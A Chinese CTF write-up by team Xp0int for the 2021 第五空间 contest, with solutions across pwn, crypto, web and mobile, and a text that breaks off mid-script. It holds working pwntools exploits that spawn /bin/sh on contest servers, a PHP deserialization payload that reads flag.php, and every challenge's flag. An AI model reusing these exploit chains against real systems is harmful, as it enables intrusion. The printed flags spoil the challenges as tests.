2021 第五空间 Writeup By Xp0int xp0int Posted on Nov 20 2021 2021 第五空间 Writeup By Xp0int ## 1. PWN ### 1.1 CrazyVM *(*(ptr+0xa8)+0x10)上的数据为libc附近的地址,可以用来算出onegadget和exithook的地址,利用add和shl进行数据的写入,最后劫持exithook写入onegadget ``` from pwn import * context(os='linux', arch='amd64',log_level='debug') p=remote("114.115.221.217",49153) #p=process("./CrazyVM") se = lambda data :p.send(data) sa = lambda delim,data :p.sendafter(delim, data) sl = lambda data :p.sendline(data) sla = lambda delim,data :p.sendlineafter(delim, data) rc = lambda numb=4096 :p.recv(numb) ru = lambda delims :p.recvuntil(delims) uu32 = lambda data :u32(data.ljust(4, '\x00')) uu64 = lambda data :u64(data.ljust(8, '\x00')) info_addr = lambda tag, addr :p.success(tag + ': {:#x}'.format(addr)) # 0x7f000000002ec000 ->0x80 # now *0x80 has libc payload1=p64(0x0e10030109)+p64(0x9b10020102)+p64(0x0e10030109)+p64(0x1110030002)+p64(0x0011030413) # -0x1260c2 payload2=p64(0x1010020003)+p64(0x1210020102)+p64(0x0810030109)+p64(0x5f10020102)+p64(0x0810030109)+p64(0x3210020102) # *0x88=*0x88 - *0x80 now onegadget in *0x88 and store to 0x40 payload3=p64(0x1011030003)+p64(0x1108030002) # *0x88 = 0x323f60 *0x80=*0x80+*0x88 *(exithook)=onegadget payload4=p64(0x1010020003)+p64(0x7f10020102)+p64(0x3810030109)+p64(0x1111030003)+p64(0x3211020102)+p64(0x0811020109)+p64(0x3f11020102)+p64(0x0811020109) payload4+=p64(0x6011020102)+p64(0x1110030002)+p64(0x1111030003)+p64(0x0811030002)+p64(0x0011030412) sla("vm: ",payload1+payload2+payload3+payload4) #debug_pause() # b *$rebase(0xD823) sla("vm: ","a"*0x100) p.interactive() # remote # 0xe6c7e execve("/bin/sh", r15, r12) # constraints: # [r15] == NULL || r15 == NULL # [r12] == NULL || r12 == NULL # 0xe6c81 execve("/bin/sh", r15, rdx) # constraints: # [r15] == NULL || r15 == NULL # [rdx] == NULL || rdx == NULL # 0xe6c84 execve("/bin/sh", rsi, rdx) # constraints: # [rsi] == NULL || rsi == NULL # [rdx] == NULL || rdx == NULL ``` flag: `flag{b30c1a985e265121947d997582645441}` ### 1.2 notegame 
edit 处可以溢出 8 个字节。 首先重用覆盖有非零字符的堆块,通过 view 功能泄露 Info 指针,得到 libc 地址;然后利用堆溢出将堆块的 header 清零,伪造 meta 并释放到 active bin 中。最后通过控制 fake meta 使 __malloc_replaced 为非空,修改 ofl_head 为 fake stdout ,调用 exit 执行 system("/bin/sh") getshell。 ``` from pwnX import * p_run("114.115.152.113:49153") p_run("./notegame") def add(size, ctx): p_sl("AddNote", "Note@Game:~$") p_sl(size, ":") p_s(ctx, ":") def edit(idx, ctx): p_sl("EditNote", "Note@Game:~$") p_sl(idx, ":") p_sl(ctx, ":") def free(idx): p_sl("DelNote", "Note@Game:~$") p_sl(idx, ":") def view(): p_sl("ViewInfo", "Note@Game:~$") def update(s, name, info): p_sl("UpdateInfo", "Note@Game:~$") p_sl(s, ":") p_s(name, ":") p_sl(info, ":") def temp(addr, ctx): p_sl("TempNote", "Note@Game:~$") if addr: p_sl(addr, ":") p_sl(ctx, ":") def gift(addr): p_sl("B4ckD0or", "Note@Game:~$") p_sl(addr, ":") add(0x20, "A"*0x20) for i in range(7): add(0x30, 'A'*0x30) free(1) update(0x10, 'a'*0x10, "aaaa") view() libc_addr(p_rec(6, beg="aaaaaaaaaaaaaaaaAAAAAAAAAAAAAAAA", israw=1, check=1), 0xb7c90) gift(libc_os(0xB4AC0)) secret = p_rec(8, beg="Mem: ", israw=1, check=1) sizeclass = 6 fake_mem = libc_os(0xb78c0) fake_meta = flat([ secret, # area->check 0, 0, # meta->prev, meta->next fake_mem, # meta->mem 0, # meta->avail_mask, meta->freed_mask (sizeclass << 6) + 1, # meta->sizeclass, meta->last_idx ]) temp(0xdeadbeef000, fake_meta) add(0x60-4, "\n") add(0x60-4, "\n") edit(1, NUL*0x50+p64(0xdeadbeef008)) free(8) malloc_replaced = libc_os(0xB6F84) fake_meta = flat([ secret, # area->check 0, 0, # meta->prev, meta->next malloc_replaced+4-0x10, # meta->mem 1, # meta->avail_mask, meta->freed_mask (0 << 6) + 1, # meta->sizeclass, meta->last_idx ]) temp(0, fake_meta) # ~ p_ins("b malloc") add(0x68, '\n') fake_mem = libc_os(0xB6E48) fake_meta = flat([ secret, # area->check 0, 0, # meta->prev, meta->next fake_mem-0x10, # meta->mem 1, # meta->avail_mask, meta->freed_mask (0 << 6) + 1, # meta->sizeclass, meta->last_idx ]) temp(0, fake_meta) stdout = flat({ 0: 
b"/bin/sh\x00", 0x20: 1, # f->wpos 0x28: 1, # f->wend 0x48: libc_os(0x50A90), # f->write }, filler=NUL) add(0x68, libc_osp(0xB6E48+8)+stdout+NL) p_sl("Exit") p_go() ``` FLAG: `flag{9674ab36b62e6b308973ef92c2922b6e}` ### 1.3 bountyhunter 简单栈溢出,溢出执行system("/bin/sh") ``` from pwn import * context(os='linux', arch='amd64',log_level='debug') #context.terminal =['tmux', 'splitw', '-h'] p=remote("139.9.123.168",32548) #p=process("./hunter") elf=ELF("./hunter") #libc=ELF("/lib/x86_64-linux-gnu/libc.so.6") se = lambda data :p.send(data) sa = lambda delim,data :p.sendafter(delim, data) sl = lambda data :p.sendline(data) sla = lambda delim,data :p.sendlineafter(delim, data) rc = lambda numb=4096 :p.recv(numb) ru = lambda delims :p.recvuntil(delims) uu32 = lambda data :u32(data.ljust(4, '\x00')) uu64 = lambda data :u64(data.ljust(8, '\x00')) info_addr = lambda tag, addr :p.success(tag + ': {:#x}'.format(addr)) rop= '\x00'*0x90+p64(0)+p64(0x40120b)+p64(0x403408)+p64(elf.symbols["system"]) sla("want?",rop+'\n') p.interactive() ``` FLAG: `flag{GXaawi8DwieSxP4IeolLCSWLTe0G}` ## 2. 
Crypto ### 2.1 ecc ``` # 前两个ecc就用PolligHellman就能解出来 # 剩下最后一个用smart's attack # 参考论文[**https://wstein.org/edu/2010/414/projects/novotney.pdf**]( from sage.all import * from Crypto.Util.number import long_to_bytes,bytes_to_long # Define the curve p = 146808027458411567 a = 46056180 b = 2316783294673 # Generator g_x = 119851377153561800 g_y = 50725039619018388 F = FiniteField(p) E = EllipticCurve(F,[a,b]) G = E.point((g_x, g_y)) n = G.order() print(n.factor()) ''' 2^2 * 7 * 193 * 110603 * 122811083 ''' primes = [4 , 7 , 193 , 110603 , 122811083] x=22306318711744209 y=111808951703508717 C = E.point((x, y)) dlogs = [] for fac in primes: t = int( n // fac ) dlog = discrete_log( t*C , t*G, operation='+' ) dlogs += [dlog] print("factor:"+str(fac)+",Discrete Log:"+str(dlog)) nC = crt(dlogs,primes) print(long_to_bytes(nC)) # 第二条曲线跟第一条曲线是一样的 就不再抄一遍了 from Crypto.Util.number import long_to_bytes p = 0xd3ceec4c84af8fa5f3e9af91e00cabacaaaecec3da619400e29a25abececfdc9bd678e2708a58acb1bd15370acc39c596807dab6229dca11fd3a217510258d1b A = 0x95fc77eb3119991a0022168c83eee7178e6c3eeaf75e0fdf1853b8ef4cb97a9058c271ee193b8b27938a07052f918c35eccb027b0b168b4e2566b247b91dc07 B = 0x926b0e42376d112ca971569a8d3b3eda12172dfb4929aea13da7f10fb81f3b96bf1e28b4a396a1fcf38d80b463582e45d06a548e0dc0d567fc668bd119c346b2 E =EllipticCurve(GF(p),[A,B]) g_x = 10121571443191913072732572831490534620810835306892634555532657696255506898960536955568544782337611042739846570602400973952350443413585203452769205144937861 g_y = 8425218582467077730409837945083571362745388328043930511865174847436798990397124804357982565055918658197831123970115905304092351218676660067914209199149610 G = E.point((g_x, g_y)) x=964864009142237137341389653756165935542611153576641370639729304570649749004810980672415306977194223081235401355646820597987366171212332294914445469010927 y=5162185780511783278449342529269970453734248460302908455520831950343371147566682530583160574217543701164101226640565768860451999819324219344705421407572537 C = 
E.point((x, y)) def HenselLift(P,p,prec): E = P.curve() Eq = E.change_ring(QQ) Ep = Eq.change_ring(Qp(p,prec)) x_P,y_P = P.xy() x_lift = ZZ(x_P) y_lift = ZZ(y_P) x, y, a1, a2, a3, a4, a6 = var('x,y,a1,a2,a3,a4,a6') f(a1,a2,a3,a4,a6,x,y) = y^2 + a1*x*y + a3*y - x^3 - a2*x^2 - a4*x - a6 g(y) = f(ZZ(Eq.a1()),ZZ(Eq.a2()),ZZ(Eq.a3()),ZZ(Eq.a4()),ZZ(Eq.a6()),ZZ(x_P),y) gDiff = g.diff() for i in range(1,prec): uInv = ZZ(gDiff(y=y_lift)) u = uInv.inverse_mod(p^i) y_lift = y_lift - u*g(y_lift) y_lift = ZZ(Mod(y_lift,p^(i+1))) y_lift = y_lift+O(p^prec) return Ep([x_lift,y_lift]) def SmartAttack(P,Q,p,prec): E = P.curve() Eqq = E.change_ring(QQ) Eqp = Eqq.change_ring(Qp(p,prec)) P_Qp = HenselLift(P,p,prec) Q_Qp = HenselLift(Q,p,prec) p_times_P = p*P_Qp p_times_Q=p*Q_Qp x_P,y_P = p_times_P.xy() x_Q,y_Q = p_times_Q.xy() phi_P = -(x_P/y_P) phi_Q = -(x_Q/y_Q) k = phi_Q/phi_P k = Mod(k,p) return k long_to_bytes(SmartAttack(G,C,p,8)) ``` FLAG: `flag{025ab3d9-2521-4a81-9957-8c3381622434}` ### 2.2 secrets ![图片标题](https://leanote.com/api/file/getImage?fileId=6197cc9fab644142b4b504a3) ``` import random, hashlib from Crypto.Util.number import * from Crypto.Cipher import AES enc_flag = 0xbf550e796d6efc92e8543ffcbb8d81fd588900f8f7aecaeeee718d60eaace3bc a = [6208495304507502877592974397978564449062722480435998477821753565334623511793847345749111308898139670628857817327159494561065840693449298616913891952427947, 4428365792626193951517975036630823002373517124620690551190165499794155382003347632615508488697880129516880024881940903287205636949002132541035487795791827, 4718311857821047798142460474602800502374374326300654458450570361490723801361197812174259099714079434910279510299556693616702570294307587124784370853830179] p = 12974234240047250882827277463970749648223428465145328709918053842153820677294215343957019413719473165129078971772191068642653862027980142472460705711018201 c = 
8024639827831958040886215528711059283414630802186262470325506233115495366865722141662305750597559580380055075908821369972992187624854877285935207126822671 i = 128 R = 2**i M = Matrix([[1,0,0,0,a[0] * R],[0,1,0,0,a[1] * R],[0,0,1,0,a[2] * R],[0,0,0,1,-c * R],[0,0,0,0,p * R]]) L = M.BKZ() s3 = gcd(L[0][0],abs(L[0][1])) s1 = abs(L[0][1]) // s3 s2 = sqrt(abs(L[0][0]) // s3 // s3) secrets = [s1,s2,s3] key = hashlib.sha256(str(secrets).encode()).digest() cipher = AES.new(key, AES.MODE_ECB) flag = cipher.decrypt(long_to_bytes(enc_flag)) ``` flag: `flag{r1t679af2aq9fgu6e2nc5zg7hpdm6mm8}` ### 2.3 signin ``` # plaidCTF 2021里面的那个xorsa改了一下 # 把给出来的p ^ q 的位数减少到了400位 # 依旧可以用bfs得到p的低400左右的位数 # 然后coppersmith method即可 p一共就512位 from Crypto.Util.number import * from tqdm import tqdm c = 41079136228776331983513986502894911009747944746334405367181525535644429164244074690458675696682154772257649811625401364517966224711291000199478649309514306511977247475050430881892635166215911325729515065570801798281126631754714292634605360578171629351703909902943766832088848829679735266081587467028354629832 e = 65537 n = 88873300622677925132392673651975872286851841516213062658793503010409158793653030553313986481205677326846210604582870123515082097235868012724220463515351466605298734168814756198761860328588678124560858545154560701982246840286690871368569184620040790812223630254910190657002367120010677907467764741789052920477 x = bin(138384108215091704603441412066611031482512354164750119910659929381838248956079740784293945420743011870999379776464932828)[2:] P = [] def find(guessp,i): p = int(guessp,2) q = int(x[-i:],2) ^^ p if (q * p) % 2 ** i == n % 2 ** i: if i == 399: P.append(p) else: find('1'+guessp,i+1) find('0'+guessp,i+1) find('1',1) print(len(P)) pbits = 512 for i in tqdm(range(len(P))): _p = P[i] kbits = 512 - len(bin(_p)[2:]) R.<x> = Zmod(n)[] f = P[i] + x * 2^len(bin(_p)[2:]) f = f.monic() roots = f.small_roots(X=2^kbits,beta=0.4) if roots: p = int(_p + roots[0]* 2^len(bin(_p)[2:])) print(_p 
+ roots[0]* 2^len(bin(_p)[2:])) break q = n // p assert p * q == n phi = (q - 1) * (p - 1) d = inverse_mod(e,phi) long_to_bytes(pow(c,d,n)) ``` FLAG: `flag{303clm4z-24p4-t52k-xaz2-d4zgp506tusv}` ### 2.4 doublesage ``` # 就是两层lwe..... 直接当成lwe做就好了 # 手动把远程给的向量和矩阵扔进下面的脚本里 把跑出来的向量传给服务器就行了 from sage.modules.free_module_integer import IntegerLattice def BabaisClosestPlaneAlgorithm(L, w): G, _ = L.gram_schmidt() t = w i = L.nrows() - 1 while i >= 0: w -= round( (w*G[i]) / G[i].norm()^2 ) * L[i] i -= 1 return t - w p = 227 M = Matrix([[55,78,211,140,203,28,205,71,148,55,43,66,34,108,99,6,202,138,90,77,128,85,88,189,135,42,157,159,204,51,211,77,2,64,60,137,53,29,214,153,142,138,0,148,53,115,73,178,78,81,219,103,23,64,146,61,98,86,157,102,222,219,2,69,65,183,93,208,156,80,164,70,200,106,128,123,1,29,175,224,62,166,62,122,102,21,3,166,41,26,164,78,199,194,56,82,6,135,99,107,104,178,32,12,57,205,63,14,159,145,133,19,96,145,20,172,49,213,200,111,148,5,45,6,25,19,81,199,52,119,10,12,101,140,189,61,190,168,23,181,74,153,111],[168,115,109,184,137,28,38,86,70,99,113,24,148,189,43,211,9,3,139,50,120,39,192,179,92,193,96,100,124,22,214,81,216,80,55,208,184,145,132,133,177,84,64,164,121,87,191,134,38,28,2,168,66,194,117,215,83,146,217,224,54,9,188,175,39,45,18,89,68,76,20,226,155,58,70,97,209,135,210,85,108,184,7,92,226,187,205,2,88,71,92,187,186,90,182,14,58,98,32,104,141,29,131,200,85,44,30,159,4,33,113,33,49,201,54,31,158,75,225,109,30,95,142,35,204,55,203,215,156,224,2,171,87,183,175,178,168,22,24,201,28,3,20],[152,97,15,188,52,6,149,182,167,134,60,31,154,36,6,209,28,221,144,88,161,144,13,162,90,110,95,216,196,44,133,124,75,218,170,14,84,186,127,142,59,3,185,132,147,63,121,100,10,88,103,145,3,47,179,127,127,150,133,120,90,84,186,140,21,49,93,167,70,140,161,196,29,207,128,217,125,214,28,211,66,44,33,118,166,43,220,131,26,209,108,171,41,205,163,62,20,127,184,7,95,18,125,66,94,26,33,40,68,49,197,111,46,215,97,204,98,69,206,225,193,116,43,85,153,61,184,178,195,220,127,164,168,45,42,22,10
4,194,19,0,111,138,191],[54,169,0,103,88,221,86,108,36,171,128,139,198,103,154,83,193,115,84,41,84,136,75,90,20,109,219,22,107,180,136,13,203,98,133,141,57,181,139,226,161,25,21,198,3,200,17,63,223,165,54,74,76,84,189,89,84,95,191,168,91,141,109,148,186,40,5,113,0,71,167,54,29,219,55,64,3,162,34,56,138,109,65,174,43,20,158,22,175,93,136,26,193,60,180,216,24,185,56,86,205,123,31,126,120,84,47,67,165,36,217,153,192,121,142,120,153,39,188,209,119,35,223,155,49,200,215,187,10,111,138,116,223,49,14,127,100,61,197,134,143,164,192],[125,88,118,197,140,200,191,110,135,76,71,33,223,183,34,100,16,53,190,153,185,201,91,118,118,51,10,214,142,223,77,215,11,1,109,166,210,32,63,129,109,146,9,68,28,224,73,43,159,35,185,100,126,218,88,90,111,79,177,54,149,31,86,82,203,11,104,211,200,205,75,226,220,36,31,177,191,200,210,92,60,92,40,96,23,129,99,209,57,55,224,12,154,200,118,25,168,27,28,93,91,175,107,35,22,123,110,86,87,62,149,79,116,28,125,164,114,88,217,80,199,211,113,20,29,68,124,141,157,11,160,85,189,223,135,77,186,172,11,55,40,125,187],[32,42,151,123,149,215,156,87,47,27,160,145,114,118,78,113,205,152,173,92,109,62,185,201,149,216,220,72,208,55,78,1,56,177,147,30,68,223,194,126,155,59,24,10,26,8,104,211,214,119,208,141,188,65,82,130,173,190,107,156,57,157,16,72,43,154,174,52,7,22,39,163,219,134,9,49,20,75,189,182,161,32,82,15,10,22,46,33,145,120,161,216,6,185,131,226,56,53,219,173,150,94,93,10,64,99,124,195,207,220,96,80,207,155,193,223,68,166,99,189,67,78,222,15,76,35,206,19,114,149,1,141,63,20,145,56,214,212,44,186,88,141,204],[114,4,210,127,90,181,97,17,51,156,182,58,167,185,111,54,67,137,213,165,219,211,143,4,65,129,91,190,67,180,163,29,221,185,100,225,103,190,133,208,90,11,123,141,174,93,18,177,124,146,50,107,25,64,219,63,44,186,152,14,25,141,107,188,106,168,136,94,154,6,41,168,193,137,92,179,203,36,85,213,138,149,225,62,89,78,10,180,25,155,38,223,82,221,190,223,42,144,186,49,169,45,161,137,152,180,152,77,97,222,104,98,167,88,116,174,67,75,81,119,205,3,180,24,159,190,102,157
,199,152,145,146,131,208,58,121,178,95,211,214,163,196,104],[32,174,189,30,141,182,192,20,103,100,191,80,151,124,185,166,41,32,39,34,169,35,80,108,89,67,150,16,109,8,102,122,85,224,175,115,104,20,116,112,192,66,173,212,29,19,102,66,116,37,146,19,102,65,98,187,0,142,56,192,143,91,20,193,183,107,215,144,184,57,193,86,50,65,220,129,51,212,78,16,91,190,37,116,102,120,178,56,193,146,218,64,142,178,225,207,129,110,104,170,156,148,182,91,220,207,193,124,45,98,57,96,38,67,99,97,149,7,181,138,192,220,195,14,99,152,38,70,186,8,123,204,127,1,39,181,159,75,122,54,41,137,41],[115,170,6,225,99,21,139,118,133,16,175,94,163,163,222,67,220,75,215,142,8,167,86,20,94,7,169,5,145,208,213,153,38,202,191,10,66,133,92,91,95,28,38,86,127,215,3,206,67,170,14,153,108,219,0,10,64,78,74,223,199,180,16,13,169,109,224,213,142,65,12,29,100,109,104,102,131,24,202,92,70,11,215,41,35,112,39,10,182,131,120,95,112,49,116,81,43,49,54,30,225,63,167,16,118,75,193,50,125,224,161,127,186,88,196,3,0,215,219,217,168,221,206,63,86,133,153,216,16,152,39,19,183,155,200,80,33,48,150,104,193,137,189],[19,127,92,102,59,196,66,49,7,211,120,87,95,196,93,17,195,184,187,87,0,151,169,150,82,67,24,85,12,77,20,10,211,203,57,181,156,148,195,123,90,135,14,200,226,135,17,208,15,176,168,140,161,217,2,125,91,167,157,118,100,167,148,155,114,208,159,123,136,95,89,170,21,130,82,10,47,136,88,45,224,23,55,207,200,124,123,113,105,67,80,147,55,127,200,158,209,10,53,135,100,161,27,154,2,80,174,95,12,73,154,17,92,106,206,85,171,69,56,212,213,211,221,166,72,188,78,113,147,26,148,141,41,96,81,31,95,169,164,7,134,125,174],[158,177,225,122,164,132,16,150,170,166,67,2,192,194,28,104,59,148,150,106,179,217,159,94,107,217,209,225,226,39,138,219,163,116,48,40,63,140,8,139,38,144,63,94,205,210,186,217,214,141,22,186,198,114,211,219,82,34,122,92,34,182,156,170,58,41,150,36,212,197,38,131,28,110,48,224,19,109,185,142,186,14,126,156,105,33,79,93,162,183,156,135,43,144,114,8,158,102,145,194,26,29,183,205,219,196,207,142,176,21,225,50,36,22,176,100
,40,125,120,114,74,34,176,98,121,77,116,200,85,96,167,63,215,80,1,218,94,29,65,202,42,45,114],[130,124,40,71,145,69,216,122,162,57,134,79,103,8,137,110,8,103,216,172,74,219,141,99,78,104,143,110,130,49,45,54,160,15,196,67,109,208,30,21,195,46,91,38,52,115,173,77,87,111,215,100,91,220,21,4,34,203,173,9,171,129,170,202,9,185,47,198,141,90,216,156,215,99,99,185,194,217,171,155,189,54,14,7,162,173,58,79,34,103,137,208,62,165,104,143,80,33,136,39,111,176,202,207,3,15,173,139,50,49,9,165,170,78,154,180,45,153,40,157,94,73,86,207,26,199,152,12,62,192,175,60,136,96,31,171,114,8,95,17,87,39,177],[51,36,34,69,152,211,6,89,157,60,65,58,78,22,92,23,172,105,12,218,154,171,96,201,41,53,204,215,23,211,216,98,80,45,90,27,177,9,74,169,23,197,221,74,119,152,158,180,73,138,192,149,37,147,80,26,154,180,97,208,130,165,41,180,176,160,20,155,149,213,181,81,62,173,108,80,86,182,35,209,190,217,187,180,201,225,112,125,95,118,48,137,96,79,127,206,49,85,143,139,200,194,49,6,208,109,5,197,75,150,134,194,0,191,72,16,101,4,85,178,131,52,94,139,140,42,14,14,178,94,60,175,16,179,216,14,154,220,136,176,42,145,71],[11,190,138,143,159,121,173,115,63,200,179,44,222,85,202,143,118,197,66,100,116,18,180,77,86,175,32,158,43,133,0,214,162,118,71,224,78,175,82,206,136,137,135,41,146,130,55,42,38,115,165,53,105,189,27,86,61,98,189,7,164,152,188,132,97,2,89,210,14,131,81,11,193,164,174,180,166,112,162,197,27,27,80,120,70,98,197,29,172,88,207,76,81,205,92,37,25,189,66,94,108,222,152,93,116,141,176,72,111,171,204,146,118,5,185,39,171,180,124,78,208,142,85,120,217,61,177,39,77,57,164,139,147,171,149,111,152,168,191,33,98,11,180],[153,44,17,75,199,75,208,31,100,124,210,206,174,223,216,194,156,157,213,101,212,117,162,194,38,184,118,126,10,92,168,197,78,113,71,154,43,177,202,115,27,34,174,54,201,97,112,180,169,32,134,160,104,183,0,145,179,106,156,182,213,214,144,43,226,191,66,34,217,187,137,40,103,194,103,217,13,87,84,151,225,190,26,100,101,30,79,173,207,32,32,150,195,105,162,78,61,16,32,151,4,59,50,219,220,133,13,
31,104,122,93,181,5,150,188,25,222,77,111,2,41,12,129,138,107,74,30,145,21,165,192,115,119,118,112,223,74,76,167,167,218,80,121]]) P = [[0 for _ in range(143)] for _ in range(143)] for i in range(143): P[i][i] = p M = M.stack(Matrix(P)) lattice = IntegerLattice(M, lll_reduce=True) c = vector([158,93,224,147,157,86,28,224,141,124,150,117,110,88,186,115,109,119,166,206,210,89,28,63,110,16,156,125,122,201,147,185,53,211,46,1,100,217,69,12,147,64,136,20,88,198,43,110,126,101,113,81,170,190,93,82,10,217,184,32,39,18,184,214,24,190,78,152,160,62,152,38,214,16,37,28,125,51,20,54,91,220,214,47,95,113,140,226,133,185,11,214,207,189,94,92,223,34,61,168,191,163,152,203,201,215,106,180,114,140,198,177,215,201,208,152,221,0,59,147,205,3,181,104,199,205,27,145,51,105,83,17,32,221,214,194,193,148,65,20,183,102,174]) '['+str(BabaisClosestPlaneAlgorithm(lattice.reduced_basis, c))[1:-1]+']' ``` FLAG: `flag{tdhOh8zCMmH5m4i8bKUeTqhFdWQH}` ## 3. Web ### 3.1 WebFTP 从github搞到源码(https://github.com/wifeat/WebFTP)进行分析 ![图片标题](https://leanote.com/api/file/getImage?fileId=6197cd2eab644142c0e56ff9) 发现存在测试功能页面Readme/mytz.php ![图片标题](https://leanote.com/api/file/getImage?fileId=6197cd40ab644142c0e570ff) 通过这里可以看到phpinfo,在全局变量中找到flag flag{g28F28EPTjRoxM9sNBDtMS3ZPuIPXL6A} ### 3.2 pklovecloud 题目直接给了源码 ``` <?php include 'flag.php'; class pkshow { function echo_name() { return "Pk very safe^.^"; } } class acp { protected $cinder; public $neutron; public $nova; function __construct() { $this->cinder = new pkshow; } function __toString() { if (isset($this->cinder)) return $this->cinder->echo_name(); } } class ace { public $filename; public $openstack; public $docker; function echo_name() { $this->openstack = unserialize($this->docker); $this->openstack->neutron = $heat; if($this->openstack->neutron === $this->openstack->nova) { $file = "./{$this->filename}"; if (file_get_contents($file)) { return file_get_contents($file); } else { return "keystone lost~"; } } } } if (isset($_GET['pks'])) { $logData = 
unserialize($_GET['pks']); echo $logData; } else { highlight_file(__file__); } ?> ``` 分析可知链为echo $logData触发__toString,然后执行ace类的echo_name函数,绕过判断即可读取文件flag.php,payload如下 ``` <?php // include 'flag.php'; class pkshow { function echo_name() { return "Pk very safe^.^"; } } class acp { protected $cinder; public $neutron; public $nova; function __construct() { $this->cinder = new ace; } function __toString() { if (isset($this->cinder)) return $this->cinder->echo_name(); } } class acd #自己定义一个类进行序列化绕过$this->openstack->neutron === $this->openstack->nova的判断 { public $neutron; public $nova; function __construct() { $this->neutron= "a"; $this->nova="a"; } } class ace { public $filename; public $openstack; public $docker; public $heat='a';#绕过判断 function __construct() { $this->filename="flag.php"; $this->docker=serialize(new acd()); } function echo_name() { $this->openstack = unserialize($this->docker); if($this->openstack->neutron === $this->openstack->nova) { $file = "./{$this->filename}"; if (file_get_contents($file)) { return file_get_contents($file); } else { return "keystone lost~"; } } } } $a=serialize(new acp()); $b=urlencode(($a)); echo $b; #O%3A3%3A%22acp%22%3A3%3A%7Bs%3A9%3A%22%00%2A%00cinder%22%3BO%3A3%3A%22ace%22%3A4%3A%7Bs%3A8%3A%22filename%22%3Bs%3A8%3A%22flag.php%22%3Bs%3A9%3A%22openstack%22%3BN%3Bs%3A6%3A%22docker%22%3Bs%3A55%3A%22O%3A3%3A%22acd%22%3A2%3A%7Bs%3A7%3A%22neutron%22%3Bs%3A1%3A%22a%22%3Bs%3A4%3A%22nova%22%3Bs%3A1%3A%22a%22%3B%7D%22%3Bs%3A4%3A%22heat%22%3Bs%3A1%3A%22a%22%3B%7Ds%3A7%3A%22neutron%22%3BN%3Bs%3A4%3A%22nova%22%3BN%3B%7D ``` 右键得到flag ![图片标题](https://leanote.com/api/file/getImage?fileId=6197cd82ab644142c0e57418) ## 4. 
Mobile ### 4.1 capp 从capp.apk提取出app.exe,将app.exe拖进ida,f5后将伪代码复制另存为cpp文件,编译为exe方便windows上debug ``` #define _CRT_SECURE_NO_WARNINGS #include <cstdio> #include <cstdlib> unsigned char input[38] = { 0 }; unsigned char ctr = 0; char my_getchar() { return input[ctr++]; } int main(int argc, const char** argv, const char** envp) { int result; // w0 long long v4; // [xsp+0h] [xbp+0h] BYREF int* v5; // [xsp+20h] [xbp+20h] long long v6; // [xsp+28h] [xbp+28h] int v7; // [xsp+34h] [xbp+34h] int i; // [xsp+38h] [xbp+38h] int j; // [xsp+3Ch] [xbp+3Ch] v7 = 1000; v6 = 999LL; // v5 = (int *)(4 * (((unsigned __int64)&v4 + 3) >> 2)); v5 = (int*)malloc(4 * 10000); i = 0; // slogan(); scanf("%s", (char*)input); for (i = 0; i < v7; ++i) v5[i] = 0; for (j = 43; v5[j]; --v5[j]) ; ++j; --j; ++j; while (v5[j]) --v5[j]; for (j -= 43; v5[j]; --v5[j]) ; for (j += 42; v5[j]; --v5[j]) { ++v5[++j]; j -= 43; ++v5[j]; j += 42; } ++j; while (v5[j]) { ++v5[--j]; --v5[++j]; } --j; ++j; --j; while (v5[j]) --v5[j]; 省略2000多行。。 ``` 调试时发现,从第5位输入开始依次异或5,6,7,8··· 猜测输入下方即为比较值,依次异或5、6、7、8···还原即可 ``` ''' 000001493B9FC210 00 00 00 00 26 00 00 00 62 00 00 00 62 00 00 00 ....&...b...b... 输入 000001493B9FC220 62 00 00 00 62 00 00 00 62 00 00 00 67 00 00 00 b...b...b...g... 000001493B9FC230 64 00 00 00 65 00 00 00 6A 00 00 00 6B 00 00 00 d...e...j...k... 000001493B9FC240 68 00 00 00 69 00 00 00 6E 00 00 00 6F 00 00 00 h...i...n...o... 000001493B9FC250 6C 00 00 00 6D 00 00 00 72 00 00 00 73 00 00 00 l...m...r...s... 000001493B9FC260 70 00 00 00 71 00 00 00 76 00 00 00 77 00 00 00 p...q...v...w... 000001493B9FC270 74 00 00 00 75 00 00 00 7A 00 00 00 7B 00 00 00 t...u...z...{... 000001493B9FC280 78 00 00 00 79 00 00 00 7E 00 00 00 7F 00 00 00 x...y...~....... 000001493B9FC290 7C 00 00 00 7D 00 00 00 42 00 00 00 43 00 00 00 |...}...B...C... 000001493B9FC2A0 40 00 00 00 41 00 00 00 46 00 00 00 00 00 00 00 @...A...F....... 000001493B9FC2B0 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ............... 
000001493B9FC2C0 01 00 00 00 37 00 00 00 30 00 00 00 33 00 00 00 ....7...0...3... 待比较 000001493B9FC2D0 3E 00 00 00 39 00 00 00 6C 00 00 00 38 00 00 00 >...9...l...8... 000001493B9FC2E0 3E 00 00 00 6C 00 00 00 3D 00 00 00 3E 00 00 00 >...l...=...>... 000001493B9FC2F0 26 00 00 00 25 00 00 00 77 00 00 00 25 00 00 00 &...%...w...%... 000001493B9FC300 27 00 00 00 2D 00 00 00 24 00 00 00 23 00 00 00 '...-...$...#... 000001493B9FC310 2B 00 00 00 2F 00 00 00 7B 00 00 00 79 00 00 00 +.../...{...y... 000001493B9FC320 7D 00 00 00 29 00 00 00 2B 00 00 00 7A 00 00 00 }...)...+...z... 000001493B9FC330 41 00 00 00 47 00 00 00 1A 00 00 00 15 00 00 00 A...G........... 000001493B9FC340 16 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 ................ ''' s = "37 30 33 3E 39 6C 38 3E 6C 3D 3E 26 25 77 25 27 2D 24 23 2B 2F 7B 79 7D 29 2B 7A 41 47 1A 15 16".split() s = [int(_, 16) for _ in s] for i in range(len(s)): s[i] ^= 5 + i print(bytes(s)) # 26460f32a3164e6382436aba45eaf862 ``` FLAG : flag{26460f32a3164e6382436aba45eaf862} ### 4.2 uniapp 解压出apps__UNI__14D1880\www\app-service.js 主要逻辑在这 ![图片标题](https://leanote.com/api/file/getImage?fileId=6197cdcbab644142b4b514ea) f["encrypt"](c)调用类似 ChaCha 加密的函数(常量 sigma、20 轮、16/12/8/7 的 quarterround 均与 ChaCha20 一致),依葫芦画瓢解密即可 ``` iv = [0, 0, 0, 0, 0, 0, 0, 74, 0, 0, 0, 0] key = [_ for _ in range(32)] def _get32(t, e): return t[e] ^ t[e+1] << 8 ^ t[e+2] << 16 ^ t[e+3] << 24 n = 1 _rounds = 20 _sigma = [1634760805, 857760878, 2036477234, 1797285236] _param = [_sigma[0], _sigma[1], _sigma[2], _sigma[3], _get32(key, 0), _get32(key, 4), _get32(key, 8), _get32(key, 12), _get32(key, 16), _get32(key, 20), _get32(key, 24), _get32(key, 28), n, _get32(iv, 0), _get32(iv, 